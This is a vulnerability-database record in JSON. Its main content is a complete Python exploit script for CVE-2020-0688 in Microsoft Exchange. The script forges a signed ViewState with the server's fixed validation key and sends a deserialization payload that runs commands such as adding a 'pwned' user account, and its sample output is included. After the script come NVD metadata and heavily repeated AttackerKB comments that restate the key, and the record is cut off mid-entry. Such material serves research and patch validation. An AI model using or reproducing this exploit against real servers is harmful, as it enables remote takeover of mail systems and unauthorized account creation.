{"id": "PACKETSTORM:156592", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft Exchange 2019 15.2.221.12 Remote Code Execution", "description": "", "published": "2020-03-02T00:00:00", "modified": "2020-03-02T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/156592/Microsoft-Exchange-2019-15.2.221.12-Remote-Code-Execution.html", "reporter": "Photubias", "references": [], "cvelist": ["CVE-2020-0688"], "lastseen": "2020-03-04T15:06:30", "viewCount": 149, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-0688"]}, {"type": "attackerkb", "idList": ["AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "cisa", "idList": ["CISA:18E5825084F7681AD375ACB5B1270280"]}, {"type": "exploitdb", "idList": ["EDB-ID:48153", "EDB-ID:48168"]}, {"type": "zdt", "idList": ["1337DAY-ID-34037", "1337DAY-ID-34051"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:F05591B26EFD622E6C72E180A7A47154"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688"]}, {"type": "zdi", "idList": ["ZDI-20-258"]}, {"type": "canvas", "idList": ["OWA_RCE"]}, {"type": "mssecure", "idList": ["MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156620", "PACKETSTORM:158056"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE"]}, {"type": "threatpost", "idList": ["THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55"]}, {"type": "mskb", "idList": ["KB4536989", "KB4536987", "KB4536988"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05"]}, {"type": "kaspersky", "idList": ["KLA11664"]}, {"type": "avleonov", "idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813"]}, {"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_FEB_EXCHANGE.NASL"]}, {"type": "krebs", "idList": ["KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6"]}], "modified": "2020-03-04T15:06:30", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2020-03-04T15:06:30", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://packetstormsecurity.com/files/download/156592/msexchange2019-exec.txt", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution \n# Date: 2020-02-28 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 \n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys \n# Vendor Homepage: https://www.microsoft.com \n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4 \n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019 \n# CVE: CVE-2020-0688 \n \n#! /usr/bin/env python \n# -*- coding: utf-8 -*- \n''' \n \n \nCopyright 2020 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2020-0688-Photubias.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 2. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \nReverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net \n \nExample Output: \nCVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\" \n[+] Login worked \n[+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570 \n[+] Detected OWA version number 15.2.221.12 \n[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable! \n[+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]: \n[+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g== \nSending now ... \n''' \nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass \n \n## STATIC STRINGS \n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations) \nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=') \n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability) \nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF') \n \ndef convertInt(iInput, length): \nreturn struct.pack(\"<I\" , int(iInput)).encode('hex')[:length] \n \ndef getYsoserialPayload(sCommand, sSessionId): \n## PART1 of the payload to hash \nstrPart1 = strSerTemplate.replace('###payload###', sCommand) \n## Fix the length fields \n#print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand)) \n#print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand)) \nstrLength1 = convertInt(0x06b8 + len(sCommand),4) \nstrLength2 = convertInt(0x04da + len(sCommand),4) \nstrPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:] \nstrPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:] \n \n## PART2 of the payload to hash \nstrPart2 = '274e7bb9' \nfor v in sSessionId: strPart2 += binascii.hexlify(v)+'00' \nstrPart2 = binascii.unhexlify(strPart2) \n \nstrMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest() \nstrResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac)) \nreturn strResult \n \ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar): \nif not sTarget[-1:] == '/': sTarget += '/' \n## Verify Login \nlPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'} \ntry: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read() \nexcept: print('[!] Error, ' + sTarget + ' not reachable') \nbLoggedIn = False \nfor cookie in oCookjar: \nif cookie.name == 'cadata': bLoggedIn = True \nif not bLoggedIn: \nprint('[-] Login Wrong, too bad') \nexit(1) \nprint('[+] Login worked') \n \n## Verify Session ID \nsSessionId = '' \nsResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read() \nfor cookie in oCookjar: \nif 'SessionId' in cookie.name: sSessionId = cookie.value \nprint('[+] Got ASP.NET Session ID: ' + sSessionId) \n \n## Verify OWA Version \nsVersion = '' \ntry: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2] \nexcept: sVersion = 'favicon' \nif 'favicon' in sVersion: \nprint('[*] Problem, this user has never logged in before (wizard detected)') \nprint(' Please log in manually first at ' + sTarget + 'ecp/default.aspx') \nexit(1) \nprint('[+] Detected OWA version number '+sVersion) \n \n## Verify ViewStateValue \nsViewState = '' \ntry: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0] \nexcept: pass \nif sViewState == 'B97B4E27': \nprint('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!') \nelse: \nprint('[-] Error, viewstate wrong or not correctly parsed: '+sViewState) \nans = raw_input('[?] Still want to try the exploit? [y/N]: ') \nif ans == '' or ans.lower() == 'n': exit(1) \nreturn sSessionId, sTarget, sViewState \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='') \nparser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='') \nparser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='') \nparser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='') \nargs = parser.parse_args() \nif args.target == '' or args.username == '' or args.command == '': \nprint('[!] Example usage: ') \nprint(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"') \nelse: \nif args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ') \nelse: sPassword = args.password \nctx = ssl.create_default_context() \nctx.check_hostname = False \nctx.verify_mode = ssl.CERT_NONE \noCookjar = cookielib.CookieJar() \n#oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}) \n#oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy) \noOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar)) \nsSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar) \nans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ') \nif ans.lower() == 'n': exit(0) \nsPayLoad = getYsoserialPayload(args.command, sSessionId) \nprint('[+] Got Payload: ' + sPayLoad) \nsURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad) \nprint(' Sending now ...') \ntry: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'})) \nexcept urllib2.HTTPError, e: \nif e.code == '500': print('[+] This probably worked (Error Code 500 received)') \n \nif __name__ == \"__main__\": \nmain() \n`\n"}

{"cve": [{"lastseen": "2021-02-02T07:36:54", "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.", "edition": 8, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-11T22:15:00", "title": "CVE-2020-0688", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-02-20T17:15:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2010", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2020-0688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0688", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2010:sp3_rollup_30:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:53:46", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka \u2018Microsoft Exchange Memory Corruption Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 26, 2020 5:02pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4**hartescout** at February 26, 2020 2:30am UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**J3rryBl4nks** at March 02, 2020 10:11pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**theguly** at February 28, 2020 4:45pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**xFreed0m** at March 10, 2020 2:34pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**todb-r7** at April 09, 2020 2:08pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**ccondon-r7** at March 06, 2020 11:31pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**tsellers-r7** at March 05, 2020 10:29pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**gwillcox-r7** at October 20, 2020 6:47pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**jbarto** at February 28, 2020 4:51pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3\n", "modified": "2020-09-18T00:00:00", "published": "2020-02-11T00:00:00", "id": 